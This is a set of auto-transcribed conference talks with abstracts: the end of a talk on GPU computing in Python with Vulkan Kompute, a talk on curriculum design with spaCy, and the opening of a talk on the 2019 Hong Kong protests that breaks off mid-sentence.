just a binary classification, and we're going to be letting the machine do the learning in the GPU. So what are we going to be doing in terms of intuition, we're going to have input data that is going to look like two numbers that are going to go through our model, our machine learning model, and are going to perform a prediction, which ultimately should be what we are expecting. And what it looks like, at least the training data that we're going to be using the training data that we're going to be using is going to be basically, you know when we see zero and zero we expect zero, who is zero and one we expect one we see one one we expect one, and we have like you know, a bunch of different training data that looks like this, extremely simple I know but just to make sure that you know the intuition comes through, as opposed to the machine learning I mean this is not a machine learning talk. And then you know what we're doing is we want to actually train a machine learning model basically learn the parameters that would allow us to ensure that every time that we have this inputs, we provide the respective outputs. Right. And you know we, there is sort of like a more in depth blog post that covers the underlying, you know functions, and the way that everything is broken down but we're going to skim through some of that. And if you're curious you can actually delve into that. We're still going to talk about what's actually going to be happening. We're going to be trying to find the parameters of this function. This is going to be the input, basically that sort of like specific x one and x two that you saw. In this case, because we want to actually leverage the hardware parallel capabilities, we're going to be able to submit multiple as micro batches so instead of just running one by one. We're going to be doing like five at the same time so the GPU actually runs five, and then comes back to us. So that's, that's how we're going to be able to do this. We're going to be learning this to parameters w and B. And we're going to be basically, you know this is the function that calculates that prediction. Right, we're not going to be delving into too many too much of the depths but there's a blog post that covers this in a bit more detail. And there's thousands of talks that talk about logistic regression in Python so more than welcome to check that key thing here is that this will be the shader code that we're going to be writing, right and even though we're not going to cover in much detail we're still going to be looking at what that what actually required to actually write that. And then the compute side so this is the shader but the compute side is what is going to be running this, we're going to have to create a bunch of tensors that represent our input data, our parameters, our predictions, etc etc the training data, we're going to have to initialize those tensors using, you know, in the sequence, we're going to initialize the algorithm, right, and then we're going to actually, so we're going to record it. And then we're going to actually like initialize them, and then we're going to iterate and learn, let the machine do the learning right so we're actually going to be running multiple different sort of like iterations to that data set, updating the parameters every single time, running micro batches that are running in the GPU in parallel. Yes, we're going to be basically doing that. And then, once we actually iterate those 100 times, we're going to be having learned those parameters. And basically what we're going to be doing in this high level logic. And you know, you know this is just an intuition right the key thing here is to see what's happening in the, in the compute and in the in the in the shader side. So the shader what it looks like is just a much more complex version of what we saw earlier. Right so we have all of the inputs so Xi, which is x one x two is each of them they're going to be an array because it's micro batches. So we have the expected outputs, we have the weights that are coming in and we have the weights that are output and calculated remember that the parameters that we're learning are w and B. So those are things that we actually want to take out. And you know we also taking the loss to be able to reuse where we're relevant, and the number of parameters to use right so in this case what we're going to be doing is we're going to be, you know, taking the specific input weights that are continuously in each of them. And then we're going to be able to take out the parameters that we're going to be able to use. And then we're going to be able to take out the parameters that are, these are the ones, the parameters that are we're going to update in each execution so we have to pass them every single time. We're going to be calculating the function right so as we saw, you know this is basically the function that we just had. And you know the blog post I break it down in very minute detail of how we actually go through each of of these steps and and we're going to be able to take out the parameters as the respective loss. But here the key thing is that we are able to ultimately calculate the, the, the, the parameters that that we now have. Right so now in the compute side, we're going to first create all of the specific tensor so as we saw we had some training data. This is the zero, zero equals zero. So we're going to be able to calculate the function zero should be that you know one one should be one etc etc. And then you know this is how we start with our weights so we start with just like a random initialization, which then you know we're going to be iterating towards. We're going to then similarly start with, you know, run a mission initialization for our other parameter which is going to be zero. And then the number of, you know, data points is going to be basically the actual size of this parameter right so we're going to start with with five. Right so that's what we're going to be doing we're going to be starting that in a variable called parameters so we can reference them. We're then going to just initialize it by creating our manager and initialize the tensors so what this does is it actually initializes them explicitly, whereas before we didn't do it we did, we did it implicitly with that, with a utility function so we initialize all of the parameters in the GPU so they're accessible in GPU memory. Then we're actually creating and recording this the operations in the sequence. So what are the operations, we're going to first actually sync the data to device for these two tensors, because remember the parameters are going to be updated every iteration. So we're going to be in the GPU device memory, we're going to then record that algorithm that we just actually wrote this is the the logistic regression shader that you saw so we're going to record that execution, and then we're going to record a sync to local. Right so we're going to record for all of the weights, the parameters and the, and the, and the, and the loss to actually be copied back to the host so that Python can see them. And then finally we're going to iterate 100 times by, you know, every iteration, running that shader or running the sequence which is basically all of the things that we just recorded, and then operating and then updating all of the, all of the weights. So I think there's an indentation missing here but basically what is happening here is we're just basically updating it by, you know, the specific learning rates which is just how fast do we want the actual parameters to be updated on each iteration. Again, the key thing here is just to see all of the features that you're able to use with compute and leveraging a simple machine learning use case as an example. And of course we're skimming through unconscious. Sorry for that for the people that you know, maybe are seeing this and going like well you know actually that's you know, 100% correct but you know in the blood post I break it down and you know much more in detail. This is just to show how you're able to actually interact with the GPU, and you know, optimize in different areas by you know pre recording components using the sequence etc etc. So in this case we're just iterating. In the finished you're able to then just print the calculated parameters which in this case, they are the first way the second way. The third way, and the actual be bias, which is ultimately what we ended up with. And so to emphasize you know we covered kind of like this high level example, but as I mentioned we have a blog post that covers this one in Python, one in C++. It breaks it down in in my new detail, and we have other tutorials other examples that cover, you know how to use this and actually the C++ as opposed to the Python one for integrating with your Android apps, as well as to game engines like the Godot engine, which we would recommend to check out. So more than anything what I recommend is to get involved. You know if you go to GitHub.com slash ethical ml slash Vulkan compute, you'd be able to actually check out what are some of the open issues. You know you can take one of the good first issues labeled good first issues. And also please you know there's open there's an issue number 52 which is open for just general discussion so you have ideas for improvements, or questions, and you can actually just post them in the chat, and we've had some really interesting suggestions. So the key things in the roadmap, you know one of the main motivations to build this framework is to actually integrated as a backend of an existing site scientific computing framework that is potentially even being used for, you know, mobile, you know machine learning or for other types of use cases so definitely really interesting on that and if someone is, you know, running a scientific computing library then you know being open to explore. Also creating more default operations, something like a fast forward transform or like a parallel some reduction, things like that would be really cool to have like out of the box operations that are, you know perhaps even written in C++ but also exposed as a new model. And then also adding examples if you try this in a new sort of shader, or a new sort of like algorithm, a new machine learning type of model, you know would love to actually contributed upstream and you know added to the repo because I think that that would be very cool. And so that's it. I think that's everything that we had sort of to cover today. Thank you very much for joining this talk on beyond kura GPU accelerated Python on cross vendor graphics card with Vulkan and compute. And I would like to take this opportunity to take this opportunity forward to explore and hear your thoughts, ideas and suggestions. And if you have any questions do please feel, feel free to reach out. Thank you very much.
This talk will provide practical insights on high performance GPU computing in Python using the Vulkan Kompute framework. We will cover the trends in GPU processing, the architecture of Vulkan Kompute, we will implement a simple parallel multiplication example, and we will then dive into a machine learning example building a logistic regression model from scratch which will run in the GPU.
10.5446/53300 (DOI)
Hello everyone. My name is Gajendra Deshpande. I'm working as a student professor at KLS Gopin Institute of Technology India. Today I will be delivering a talk on inventing curriculum using Python and Spacey. So this project was supported by Google Cloud under GCP Research Science Program. In today's talk we will discuss about curriculum and its basic definition, then text summarization, then two Python libraries which are widely used for NLP tasks, that is, spacey and text-sy, then our experiment, then finally the conclusion. So let us first define the term curriculum. So these were the few definitions which were listed on the University of Delaware website. So curriculum is nothing but a course of study that will enable the learner to acquire specific knowledge and skills. A curriculum is the combination of instructional practices, learning experiences, and students performance assessment that are designed to bring out and evaluate the target learning outcomes of a particular course. So a selection of information segregated into disciplines and courses typically designed to achieve a specific educational objective. A curriculum is the program of instruction. It should be based on both standards and best practice research. It should be the framework that teachers use to plan instruction for their students. Curriculum can be both written and unwritten. But in our experiment we are focusing on written curriculum. So on this page you are seeing the structure of undergraduate engineering program in India. So this was defined by AICT, that is, All India Council for Technical Education, which is the highest body which defines the standards and standard curriculum for engineering and diploma courses in India. So if you look at the syllabus here, if you look at the content, you can see that it's the combination of different types of courses. For example, we have humanities and social science courses, basic science courses, then engineering science courses, professional core courses and professional elective courses. Then there are some open subjects and there is a project work and there are some mandatory courses. So different types of courses have been included to prepare students for better career options. Now on this page you are seeing the sample curriculum for one subject. So that is web technology subject. So if you see the content here, the content has been divided into few units. So in the first few units, the student will learn the introductory concepts. Then in next few units that is in unit 3, 4 and 5, he'll learn about basics of HTML, JavaScript, CSS and XML. And finally, server scripting language, that is PHP. Now let us compare this syllabus with the job requirement. Now on this page you can see that there is a typical job description given on India.co.in website and you can see here the qualifications section. So in qualification section it is mentioned that apart from HTML, CSS, JavaScript, there are other things required. They are jQuery and Bootstrap. So clearly this is missing from our syllabus. Now let us compare it with another job opening. So this time for full stack web developer. Now again if you see here Bootstrap and Material UI are missing, then on server side Python, Go, Java, things are missing. Now also there are some technologies which are mentioned here such as React, Angular, View and Webpack. Again these things are missing from the syllabus. So clearly it shows that there is a gap, there is a large gap between the syllabus set by the university and the job description given by the employer. So now let us discuss the next concept that is the text summarization. So in text summarization what we do is we shorten the long pieces of text by applying computational methods. So what we do is we use some statistical techniques. We count the word frequency, then we compute the sentence score, then we pick the sentences which are having high scores. So that is how the summary will be generated from the long pieces of text. Now there are two types of text summarization techniques. One is extractive summarization and second one is abstract summarization. Now if you see the diagram on the right hand side, the first part. So there are three sections here, three blocks. So in the first block there is a text which is divided into sentences. They are numbered from sentence one to sentence n. Then we are going to apply some computational methods and we are going to get the summary. Now when we get the summary basically it will be the subset of the original text. Now next if you observe the bottom diagram here, now in this case again we have a text which is represented by n sentences. But now this time it is an abstraction. Now again in this case summary will be generated. But in this case it is not just the subset of the original text plus new sentences are generated. Now the concept which we are going to discuss is pointer generator network which is nothing but the combination of extractive as well as abstract summarization techniques. So we apply extractive summarization technique to get the pointers. Now based on these pointers the new text or new information will be generated using abstract summarization techniques. So that is not a generator in simple terms. Now each of these techniques that is both extractive as well as abstractive techniques they have their own advantages and disadvantages. For example, extractive summarization technique is fast but it may not give you the accurate results because it just gives you the subset of sentences. So it may not form a context. Then in case of abstractive summarization techniques it takes bit of time but it gives more realistic results. Now in our experiment we have followed these steps. So in the first step we have created a dataset of job postings from various job portals like indy.co.in, then stack, coreflow and other websites. Then in the next step we removed unwanted stop words, numbers, punctuation marks and unrelated words. Now note here that removing unrelated words is also important because they just don't form a context and there is no point in processing those words. So you just need to remove those unrelated words also. For example, the location, the salary package, these are all unrelated words for our experiment. The next is to organize words and sentences. Then once you organize words and sentences you need to compute the word frequency and the sentence score. Now when you are comparing word frequency you also need to perform n gram analysis. So n gram is nothing but the n number of words occurring together. So for example if I say by gram then it is two words occurring together. Then trigram is frequency of three words occurring together and so on. So n gram is n words occurring together. The next select sentences with the high scores and concatenate them. Then sort the words in descending order of frequency. That is the highest first. We need to extract top n sentences, top n words. So we are going for highest first. Then extract the top n words and also the word combinations from the previous step and compare them with the syllabus of a particular subject. Now here there are two possibilities. First possibility is the refining the syllabus of existing subject with new keywords and second one is a proposed new subject. So if there are not much changes then we can directly adopt. So we can go for refining. If there are lots of changes then and if it is not possible to include it in one subject then we may have to divide the subject into one or more subjects. Now let's discuss the spacey library. So spacey is industrial strength NLP library. It is free open source library for advanced natural language processing in python. Spacey is designed specifically for production use and helps you to build applications that process and understand large volumes of text. It can be used to build information extraction or natural language understanding systems or to pre process text for deep learning. So spacey is not a research software. It's not a platform or it's not even an API. Okay. It's just a python library which helps us to do natural language processing tasks. Then there are some specific features which are listed in this slide. So first one is it performs non-stricted organization. It supports 61 plus languages. Then named entity recognition support is there. It also supports 46 statistical models for 16 languages. State of the art speed then easy deep learning integration part of speech tagging then label dependency parsing then syntax driven sentence segmentation then built in visualizers for syntax and NER. So these are the some of the features of spacey which makes it industrial strength NLP library. The next is text to see. So what we do in spacey is we do some basic processing of text. But if you need some advanced functionalities then you also need to go for text to see. For example, if you want perform an analysis then you should go for text to see because that support is not available in spacey. Otherwise you have to write the code manually from scratch. So that's what we have done in our project. So Texas is a python library for performing a variety of natural language processing tasks built on the high performance spacey library with the fundamentals tokenization part of speech tagging dependency parsing etc. delegated to on the library. Text to see focuses primarily on the tasks that come before and follow after. Then if you see some features of text to see here so access spacey through convenient methods for working with one or many documents and extend its functionality through custom extensions and automatic language identification for applying a right spacey pipeline for the text. Then easily stream data to and from the disk in many common formats clean normalize and explore raw text before using it with spacey. So it can also tokenize and vectorize documents then train interpret and visualize topic models and so on. Now let us look at the code which we have written line by line. So in the first line we are importing the library that is spacey then we are also importing counter module from collections then we have defined the set. So we have defined the unwanted terms here note here that this is just an indicator list which are unwanted for our project. Then next we are loading the language model. We are loading English language model then we have created a data set and it has been stored in data set dot txt file. So which is nothing but the list of job openings and their descriptions. The next NLP object is created then we are printing the number of tokens before preposing and after preposing preposing is very very important it actually removes all unwanted characters unwanted terms etc. So that we can perform NLP on only important terms. So in the next statement what we are doing is we are removing all the stop words we are removing all punctuation marks we are removing numbers we are removing extra spaces then we are removing URLs and we are also removing the emails. So all unwanted things we are removing. Then next we are performing lemmatization so lemmatization is nothing but the process of converting a word into its root form. Say for example if there is a term called as checking then when you convert checking into root form it will become check. That is we are going to remove all the prefix and suffixes from the word. Then next we are going to perform some basic task that is convert the entire text into lowercase characters because our program will treat both uppercase and lowercase characters differently so it becomes very important for us to bring it to some common form. So we are converting all the text into lowercase here then we are removing all the unwanted terms which are defined in the above unwanted set. Then next is we are printing the number of tokens after preprocessing then we are computing the grams, bi-grams and tigrams, trigrams. So gram is the frequency of single word then bi-gram is the frequency of two words occurring together then trigram is the frequency of three words occurring together. Then next we are sorting bi-gram, trigram and grams in reverse order. Then next we have defined a sample syllabus again note here that this is the processed information we have removed all the unwanted terms again this is the indicative list. Then next we are counting the number of grams in syllabus then number of bi-grams in syllabus and number of trigrams in syllabus. Then we are calculating we are trying to see how much percent our proposed syllabus is closer to the objective. Now note here that we are saying that it is closer to the objective it is not necessarily the from employment perspective. So the course may be more research focused in that case we should check how much percent it is closer to the research curriculum. If we are focusing more towards industry then we should see how much percent it is closer towards creating jobs or making the students job ready. Now this is the output now you can see it when we run it shows that before pre-processing the number of tokens were 257 after pre-processing it shows that the number of tokens are 108. So we are going to do the experiment only on 108 tokens so we have removed significantly unwanted terms which are not at all required. Then you can see here it shows the word frequency of grams so it says that HTML7 web as 5 what press as 4 CSS as 3 and so on. Then similarly it shows the word frequency of bi-grams so now it says that HTML and CSS these terms are occurring together three times web and developer these are occurring two times and so on. Then next similarly the trigram in case of trigram it says that web mobile and application these three terms are occurring together two times and translate user and business these terms are occurring together two times and so on. So from each case we need to extract top 10 grams then bi-grams and trigrams. So once that is done we are checking how many grams are found in the syllabus how many bi-grams are found in the syllabus and how many trigrams are found in the syllabus. So as per the output here it is 5. Now if we see this screen here it says that the syllabus is 50 percent closer to the objective when we just compare grams. Now when we take bi-grams into consideration it says that the syllabus is 20 percent closer to the objective. So what this indicates is that individual concepts if you consider individual concepts then it is 50 percent closer if we consider multiple concepts occurring together that is if we are going for full stack or combination of technologies then it is only 20 percent closer to the objective. So this gives us some hints to the academicians to the syllabus or curriculum designers that how they can design a syllabus which is closer to the objective. It may be industry ready or it may be research focused or it may be just fundamentals. Then finally the conclusion to achieve better results using natural language processing one of the important factories preprocessing of the document. Then using point generator network we can balance the advantages or disadvantages of the extractive or abstract summarization to get the better results. Then need to experiment with non-professional courses such as arts or humanities and with the other than English language such as Indian languages. So this is going to make the experiment more interesting. Thank you everyone for attending my talk.
Are you an educator who wants to design teach an industry-aligned curriculum? Then you have come to the right place. In this talk, we will show how to design a better curriculum using natural language processing libraries in python, i.e., spaCy and Textacy. The curriculum in the general and undergraduate curriculum, in particular, is one of the most important pillars of an education system. The undergraduate curriculum has two main objectives i.e. employability and higher education. The greatest challenge in designing an undergraduate curriculum is achieving a balance between employability skills and laying the foundation for higher education. Generally, the curriculum is a combination of core technical subjects, professional electives, humanities, and skill-oriented subjects. We used natural language processing and machine learning packages in Python to build a curriculum design system. The steps to build a curriculum design system are described below: 1. The dataset was built from the job profiles from different job listing websites like stackoverflow.com, indeed.com, linkedin.com, and monster.com. Also from the syllabus of competitive exams and qualifying exams for higher education. 2. On the dataset, we applied natural language processing techniques to identify the subjects and subject content. For natural language processing, we used spaCy an industrial-strength Natural Language Processing package in Python. 3. To generate syllabus content for a particular subject, a pointer-generator network was used. The pointer generator network is a text summarization technique that combines extractive and abstractive summarization techniques. The extractive summarization technique extracts keywords from the dataset, whereas the abstractive summarization technique generates new text from the existing text. The pointer-generator network was implemented using the scikit-learn machine learning package in Python. 4. The generated curriculum was then compared with the existing curriculum to get insights like, how much percent of the curriculum is industry oriented, how much percent of the curriculum is aimed at higher education and job-oriented skills. At this step, we used the ROGUE (Recall-Oriented Understudy Gisting Evaluation) metric to compare the generated curriculum against the reference/proposed curriculum 5. The above steps can be repeated with modified parameters to get better insights and curriculum. This also gives us an idea of how we can have an evolving curriculum that can help us bridge the gap between industry and academia.
10.5446/53128 (DOI)
Our next talk is going to be translated into German and possibly into French. There is a link you can go to. It's trimmin.c3lingo.org. You can go there for translations. We are about to start the talk called what the world can learn from Hong Kong. It's going to take 90 minutes because apparently we can learn a lot from Hong Kong. So buckle up. It's going to be a long ride. And our speaker, Catherine Tai, is a university of Oxford alumna and a PhD candidate at MIT. So let's welcome Catherine on stage. Let's give her a big round of applause. Hello, everyone. Thanks for coming. Thanks for having me to see three. For starters, I'd also like to thank the brave people who are planning to translate what I'm going to say despite knowing how fast I usually speak. So quick round of applause for the translators over there in the boxes. So my name is Catherine. I'm a PhD student at MIT where I study political science. I also work as a freelance journalist on the side. And in my capacity as a freelance journalist, I, amongst other things, covered the Hong Kong protests over the past seven months, which as you can possibly imagine was quite eventful. I think one important caveat for this talk is I am not originally from Hong Kong. And I think the people who you should probably be listening to and who I would love to put on the stage, in many cases are people who grow to great lengths to protect their own anonymity and to protect their own identity. And so these are people who would not put themselves on the stage. So what I'm going to try to do is I'm going to tell you to the best of my ability the things that I've learned from them and from the people who go out on the streets in protest in Hong Kong. But in general, my talk will be interspersed with references to journalists and some activists in Hong Kong who I recommend you follow them because ultimately they are the ones who know best. But what do I want to do? For starters, because this is 90 minutes, so I want to give you a quick heads up, I'm going to give a quick overview of why and how things are happening. So historically and politically. And we will also be showcasing some amazing protest art. And then I want to talk about the incredible strategies that protestors have been using and that they've been using for over half a year now. And that's helped them to essentially keep going for more than half a year in the face of what is truly an incredibly strong government. So also we want to talk about technology because of course it's C3. So it's incredibly important that we recognize the very high tech things that the protestors have been using to defend themselves against the police. Such as catapults. This was recently at the Chinese University of Hong Kong. But seriously, like I said, I'm going to start with some historical political background and then I'm going to move on and explain the political demands and the protest strategies that the protestors have been using. And in the end I'm going to give kind of like a quick preview of what we can maybe expect to happen in the next few years and what you can do to stay informed. So what is happening and why? Can I have light on the audience for a second? I don't know who I talked to about this. Great. So I want to know, I want to get a quick sense of how much people know about Hong Kong's politics. So if you know what the years 97 and 2047 are meaningful for Hong Kong politics, please raise your hand. Wow. Thank you. That's definitely more than I expected. I hope this won't bore you then. Thanks for the lights. That's fine. Although I actually like seeing the audience, that's quite good. I'm still going to give a quick overview. Some of you may know that Hong Kong was a British colony until 1997. So it was under British colonial rule for more than 100 years. Once the British lease of Hong Kong was up, the British negotiated an agreement with the Chinese government to return Hong Kong to China. Ironically, this event was called the handover, where Hong Kong was literally taken by a colonial power and handed over to a different government. Ironically, also, it's called the return to China because the current Chinese government was not even in power when Hong Kong was last part of what you could consider China. But at this handover event, or before this handover event, the British and the Chinese signed an important document, which was the sign of British joint declaration, which essentially says that the rights and freedoms, including those of the person, of speech, of the press, of assembly, of academic research, and of religious belief will be ensured by law in the Hong Kong special administrative region. Why are they writing something like this? Hong Kong was a colony, but because it was essentially used as a big and important commercial center, it did have a lot of kind of like societal freedoms. So people were able to protest to the extent that colonial law allowed it. And there was, for example, freedom of the press. And there were worries in the UK and also in Hong Kong. A lot of Hong Kongers were extremely worried about this, about what might happen to these freedoms when they would essentially go become part of China, which is not democratic. Not the democracy, it wasn't a democracy in the 80s or the 90s either. This is something like these anxieties were obviously exacerbated by the fact that in 89, the Chinese government suppressed a student protest in Tiananmen Square. Hong Kongers knew about this. And so they were watching from just across the border, and they were looking at the students in Tiananmen and Beijing and they were wondering, is this going to be us next? This whole thing, this whole idea that Hong Kong's freedom will be guaranteed is called one country, two systems. And so the idea is that Hong Kong gets to maintain its own government in some ways, it gets to maintain its own legal system, and it gets to maintain all these political freedoms that in many ways are not guaranteed in mainland China. In addition to that, Hong Kong does not have democracy in the sense that most people understand it. But the Hong Kong basic law says that the ultimate aim is the selection of the chief executive, which is the head of government in Hong Kong, by universal suffrage upon nomination by a broadly representative nominating committee in accordance with democratic procedures. So basically this could be read as there will also be democracy at some point maybe, depending on how we define all of these terms. So in 97, the Chinese government decided that what Hong Kong is going to get is essentially a government that is basically appointed by Beijing. It's a bit more complicated, but essentially the Hong Kong chief executive is appointed in Beijing. And people get to vote for their parliament, but the parliament doesn't really have, they can't bring, come up with laws and say we want to pass this law. So they can essentially veto bills that come from the government, but Hong Kongers basically get to elect their opposition in free and fair elections or part of their opposition, but they do not get to elect their government. So that's where we're starting in 97. So I think this is important to understand because while Hong Kong is part of China legally, it has a special status that makes it very different politically. And that's something that became very obvious in the years following the handover as well. Anthony Dapiran, a lawyer who works in Hong Kong, has called the city a city of protest. And you can see this, for example, because since the handover there has been a range of protests, all of them have been political and a lot of them have been in some ways related to China. This is just, these are just some examples. One was in 2003, the protest against article three, which was an article 23, which was an anti-subversion law. So basically it was an anti... So it was basically seen as a way for the government to get rid of people who they disagreed with politically. People protested against it and the reform was stalled. In 2012, a lot of students protested against a curriculum reform that people saw, that people essentially denounced as brainwashing. They said it would be painting democracy in a bad light and was painting China as too positive. Again, the protest succeeded. There were a range of other protests as well in the 2000s that, for example, protested for maintaining important buildings, what people called Hong Kong heritage. A lot of those unfortunately failed. But so there's been ups and downs, but it's in no way the case that Hong Kong wasn't free. People were able to go out on the streets. People went out on the streets in thousands. People had political rallies such as at a university, as you see in the picture in the background. And then 2014 happened. I'm sure people have seen this. This was the umbrella of revolution in 2014. I took this picture when I was actually at Occupy Central and I studied for my own midterm exams at the Student Study Center. What had happened was that that promise of maybe democracy that I was talking about earlier, people thought that Beijing had broken it. Because in that year Beijing had essentially published its plan for electoral reform and said that yes, you get universal suffrage, so everyone gets to vote, but we still pick the candidates. So people felt cheated and didn't think that that was what they were owed and people went into the streets. And people occupied a part of the center of the city for two full months and two full weeks, which was extremely impressive. This is basically one of the major roads in the middle of Hong Kong. It's usually full of cars. You couldn't possibly walk there, but people reclaimed it and made it into a protest village. People built their own institutions, people organized tutoring services. It was an incredible feeling. People when they were there were incredibly optimistic and were telling me it will be fine, we just need to work together. And if I asked them how were you going to get democracy, they were like, I don't know how exactly it's going to happen, but it will happen. But what actually happened is that the protest camp was cleared out by police and by the government, and there were fights internally in the democracy movement over how to continue, and so there was a lot of disagreement. And what followed was essentially a long period of political depression, right? People had been able to bring thousands of people onto the streets. But the government didn't even, except for one conversation, sit down and negotiate with them. One person who I interviewed last year, so almost two years ago now, told me at the time that if the government doesn't even listen to us, when we bring so many people out on the streets, then I don't know what can change anything politically. The one thing that Umbrella has taught me is that there are no bounds to how disappointed I can be in my government. In addition to this feeling of depression, you had several other incidents that made people feel like the promise of one country to systems that Hong Kong would really be separate from mainland China, at least until 1947 wasn't being kept. One of these examples are the bookseller abductions from 2015. The people, there were three booksellers who were abducted probably by the Chinese government, one in Thailand, one in southern China and one in Hong Kong itself. So these are people who were essentially selling books that were, honestly, a lot of it was probably rumors and kind of gossip, but they were very critical of the Chinese government. And they suddenly turned up in China again. So imagine you're a Hong Konger and you've grown up in a city where you're being told you have your own legal system and you have nothing to fear from China because if you don't go, it's your own government that isn't charged for you. But then you hear about these people who are grabbed off the street in your own hometown and you suddenly turn up in China possibly making a public confession. So that looks bad. In 2016, this is also important, people had been, the fishbowl revolution happened, which is also where this beautiful piece of art comes from. The fishbowl revolution was a protest in part of Hong Kong called Mongkok. And basically what happened was that people decided that violent means might be what is needed to oppose the government to get political change. In 2014, people had been peaceful and they had tried, but nobody listened. So if that doesn't work, some people thought we need to try new methods. So there was something that could be called a riot. And there were really clashes between police forces and protesters. People were tearing up the pavement, throwing bricks at the police. Police was throwing some bricks back. So that happened. And then between 2016 and 2018, another thing that was important happened, which is that after umbrella, there were fights about what to do. And some people decided we will go and throw bricks at the police during the fishbowl revolution. Some other people decided we want to work through the institutions and we want to get elected into the legislative council, into the parliament and we want to change the system from within. But what happened was that six candidates and then later, even six elected parliamentarians were all disqualified for in some cases not credibly promising that they essentially will uphold the Hong Kong basic law. Again, there are legal reasons for this. Some of these disqualifications were later overturned by courts. Some, I think, still stand. But I think what's really important is that what a lot of people felt was again that this was kind of like a broken promise, right? They were like, even within the system that we have, so we get to elect so few people, but even within that system, you don't let us elect the people we want to. You disqualify candidates. This is something that had never happened before. And then you also disqualify people after they've been elected. So you have democratically elected representatives of the people who essentially protested as part of an oath-taking ceremony. And those people then also got kicked out. So that looked bad. This means if you're, I'm not going to date myself, but if you're my age and you're a Hong Konger, you first lived under British colonialism where the British colonial government was in charge of your fate. And then post-97, you were just kind of like handed over to the Chinese government, maybe at the age of like four, five, six, depending on how old you were. But at no point did you actually get a choice. But you also grew up with a lot more political freedom than a lot of people in mainland China. You had no internet censorship, and people in Hong Kong talk very openly about a lot of things that the Chinese government has done. And so you're very aware of things such as the Tiananmen massacre. And you're afraid that those things might maybe happen to you in 47. When you know there's an expiration date on all the freedoms that you have, but in 47, you might also be part of that. And those things might also be what happens to you. But at the same time, what you'd also seen is that you'd seen freedoms eroded and you saw all these signs that made you think that the promises, the promise of those 50 years of freedom and of a separate political system, that that was an empty promise and that China was not intending to keep it. And this, I think, is also really important that a lot of people who I spoke to, they tell me China doesn't want one country to systems. And if they don't want it, they will undermine it if they can. So one person who I spoke to is in his 20s said China just wants one country, one system, and it's going to do whatever it wants to achieve that. And that's the mindset, I think, that we need to understand to know why people are going out on the streets right now. So people are scared of China. People think people don't trust the Chinese legal system. And what happens in 2019 is that the government introduces an extradition bill. Previously, one of the ways the Hong Kong legal system was kept separate from China is that it couldn't extradite people to China. So if someone commits a crime in China and fleece to Hong Kong, the Hong Kong government cannot send that person to China for prosecution. But what happened is that someone committed a crime in Taiwan, which Hong Kong considers to be part of China. And that person, so this person was a Hong Kong citizen, he killed his girlfriend and fled to Hong Kong, was convicted of a couple of credit card fraud charges, but because the Hong Kong courts didn't have jurisdiction, they couldn't actually get him for the murder of his girlfriend. And so the Hong Kong government said, okay, look, we're going to get an extradition bill so we can start extraditing people to Taiwan, including, and then also start extraditing people to China. I mean, what do you think? People thought about that. They weren't happy. So on June 9th, 1 million people estimated went down the street to, like, onto the streets to protest against the extradition bill. And this is where we're starting. Like, this is where the political movement starts. I'm going to, I want to give you an overview of what's happened over the past seven months because it's easy in hindsight to forget just the scale of a lot of what happened. So on June 9th, we get official numbers are 240,000, so that's the police, the organizers say 1 million people. On June 12th, we get 40,000 people who essentially gather around the government headquarter and prevent the bill from being read a second time, from being discussed, and the police use tear gas, rubber bullets, and bean backgrounds against protesters that were largely unarmed, and in some cases held umbrellas to defend themselves. People were really mad at that, and so on June 16th, the largest protest march in Hong Kong history happened with an estimated of 2 million people, which is a sizable proportion of the city's population. So people protesting. On July 21st, I think this is one of the events that people really need to know about. Well, there was a protest in the center of Hong Kong in a metro station further north in Yuen Long. Only a group of 20, 25 men and white t-shirts turned up and started beating people. So just started indiscriminately beating people up who were on the metro. We all know this because there was a journalist in the same metro station, and she was live streaming the entire thing. So for 40 minutes, she was live streaming violence that people in Hong Kong had never really seen before. People are used to being relatively safe. Hong Kong has a pretty low crime rate, and there was this incredibly vicious violence that they were all seeing on their screens. So everyone knew this. At some point, there were thousands, tens of thousands of people in this live stream, and yet the police was doing nothing and didn't turn up until after these people had disappeared. And I think within that day, they maybe arrested – I think within a couple of days, they didn't arrest anyone, and then later they arrested three people. But so far, nothing has come of that. That was really a turning point where people lost a lot of trust in institutions that they used to have before because they decided that ultimately, when in doubt, if there's some gangster beating me up, if that person is politically for the government, I cannot trust the police to come and save me. And a lot of people, especially wealthier, more well-off middle-class people, that's the point when they changed their mind. Maybe before they said, the extradition isn't that bad, I don't mind, it will be fine, but that was the moment when they saw those people getting beaten up, they looked at them and they were like, that could have been me. And that's when they said, now something needs to happen and something needs to be done about this government. So, more people go out. In the pouring rain, an estimated 1.7 million people protesting. August 31st, the estimate is tens of thousands, but this was an illegal march, so the protest wasn't allowed. So people went out to protest despite it being illegal. They knew they could be charged with illegal assembly, maybe a riot, which carries up to ten years. After that, the government essentially stopped allowing protest marches and they were like, maybe if we don't allow you to protest, people won't come out to protest. Didn't work out. On October 1st, Chinese National Day, thousands demonstrated on the streets again, and this was the first day someone was shot with a live round, so a protestor in his 20s was shot by a policeman at close range. On October 4th, again, thousands of people out on the streets, the government tries to bend masks, so they want to prevent people from hiding their faces. You see what people do in reaction to that, they put on masks and they go out to protest because it's Hong Kong. On November 8th, the first person died in the context of the protests. A young man who fell from a building near a police action, stayed in a coma for several days and then died on November 8th. This picture is from one of the vigils for him. And several days later, the second person died in the context of the protest in an old man who was probably just a bystander at a clash between police and protesters. He was hit in the head by a brick and died several days later, also after a coma. This was what set off the most extreme and the most violent days of protest in Hong Kong that we have seen this year, and possibly ever, where people started occupying university campuses and had real battles with police to essentially defend those campuses against police. And the whole thing culminated on November 18th in police essentially laying siege to an entire university, trapping people inside, and thousands of people going out to protest and trying to essentially break through the police cordon from the outside and rescue the people who were inside who were afraid of the police who didn't want to come up because they'd seen videos of police violence over the past few months and they were scared because they said, I don't know what's going to happen if I go out. But who also said, we have fought for so many months at this point, so this was November, right, so a month ago, they were saying we have fought for so many months, we cannot just give up, we need to at least try. One thing that happened as part of that was that people coordinated an absolutely insane exit from the besieged university where they basically came down from a footbridge. Some of these people are climbing, but some of them are just falling down. And then you have motorcyclists waiting for them down the bridge. All of those are coordinated online. And we don't know how many people have gone out that way, but maybe 50 or 100 and we're able to escape arrest. The siege eventually ended. A lot of people were arrested, I think more than 1,000 people were arrested around the university that was occupied. But several days later, there were district council elections, which are basically local elections in Hong Kong. This was the electoral map before the elections. Red are pro-government parties and yellow are pro-democracy parties. There was a record turnout, the highest ever in the history of Hong Kong, and the pro-democracy camp made the map to this. One thing that's important to bear in mind is that Hong Kong uses a first pass-the-post system. So you win in your district if you gain an absolute majority. So these seats actually don't translate into that much of an electoral difference. So I think it was 60-40. So it 